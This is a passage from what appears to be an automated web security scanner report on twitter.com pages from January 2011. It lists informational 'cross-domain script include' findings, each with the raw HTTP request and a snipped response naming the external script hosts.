Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234611-15123-40705
ETag: "832f661d0a321cbbeb6ed5afff3ac358"
Last-Modified: Fri, 28 Jan 2011 17:10:11 GMT
X-Runtime: 0.01082
Content-Type: text/html; charset=utf-8
Content-Length: 47146
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.550. http://twitter.com/slaterusa/status/28450023532396544

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /slaterusa/status/28450023532396544

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225144-26936-49516
ETag: "cd4ad1c42c2fbe7bf5766270caa6d4c2"
Last-Modified: Fri, 28 Jan 2011 14:32:24 GMT
X-Runtime: 0.04282
Content-Type: text/html; charset=utf-8
Content-Length: 13655
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoMY3NyZl9pZCIlODhmMDEzZThk%250AZjU0ODI2Y2NmNWZlZjI4NDg3MDNkMWY6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--b7fb88baf634d9facd394658f54740ddc1030b36; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.551. http://twitter.com/slaterusa/status/28450023532396544

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /slaterusa/status/28450023532396544

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225016-9032-41579
ETag: "2d649e661e9650b58e26ecd35a90c033"
Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT
X-Runtime: 0.06669
Content-Type: text/html; charset=utf-8
Content-Length: 13654
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoMY3NyZl9pZCIlMTFkMDY1ODkx%250AZmIzMTRjNTM4NzA5ZWFmNDcwOGFkNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--aa39b3f6965406bbcece36f3eda8aef0cfd70c30; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.552. http://twitter.com/slaterusa/status/28450023532396544

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /slaterusa/status/28450023532396544

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234612-85706-15968
ETag: "2a5a86cee075651fa28bafc5f6e1f152"
Last-Modified: Fri, 28 Jan 2011 17:10:12 GMT
X-Runtime: 0.04449
Content-Type: text/html; charset=utf-8
Content-Length: 13524
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoVaW5fbmV3X3VzZXJfZmxvdzA6%250ADGNzcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--c854af3d5ce32e01b240b192c606a132659b1f88; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.553. http://twitter.com/stubbornella

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /stubbornella

Issue detail

The response dynamically includes scripts from other domains. Hosts seen in the script tags of the captured response body:

a0.twimg.com
a1.twimg.com
a2.twimg.com
a3.twimg.com
ajax.googleapis.com
www.google.com

Request

GET /stubbornella HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-17908-9667
ETag: "c8f4f53596f1bb2e5586d7d17efcc5c7"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01178
Content-Type: text/html; charset=utf-8
Content-Length: 53443
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.554. http://twitter.com/thehomeorg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /thehomeorg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /thehomeorg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:47:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265643-97614-35318
ETag: "131b1fb1d163bdaa604bee260ed9d1f1"
Last-Modified: Sat, 29 Jan 2011 01:47:23 GMT
X-Runtime: 0.01375
Content-Type: text/html; charset=utf-8
Content-Length: 53580
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/twitter.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/jquery.tipsy.min.js?1296248415" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/lib/gears_init.js?1296248415" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/geov1.js?1296248415" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296245718/javascripts/api.js?1296248415" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296245718/javascripts/lib/mustache.js?1296248415" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296245718/javascripts/dismissable.js?1296248415" type="text/javascript"></script>
...[SNIP]...

18.555. http://twitter.com/tos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /tos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225079-3564-32486
ETag: "735f941540ad8cdd9d04c136eca0b0ca"
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
X-Runtime: 0.05573
Content-Type: text/html; charset=utf-8
Content-Length: 30493
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYTVmY2EyMDkzM2Y2ZWRjNTgyZmQ3ZDA5ZDQwYWE1%250AMDY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--2b07f7d8732d93af6476b2abb8e4dcef9120730e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.556. http://twitter.com/tos

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /tos

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:33:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225206-62368-4222
ETag: "9ec4db6c5dfe828a29cb753526e0577f"
Last-Modified: Fri, 28 Jan 2011 14:33:26 GMT
X-Runtime: 0.04178
Content-Type: text/html; charset=utf-8
Content-Length: 30493
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWNjNWVmMWYwNTExM2I3OWEzOWE0ZWQ5YjA3Mjg0%250AMDE6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--d18d5921e88204fd160c229830aecd178c24a750; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
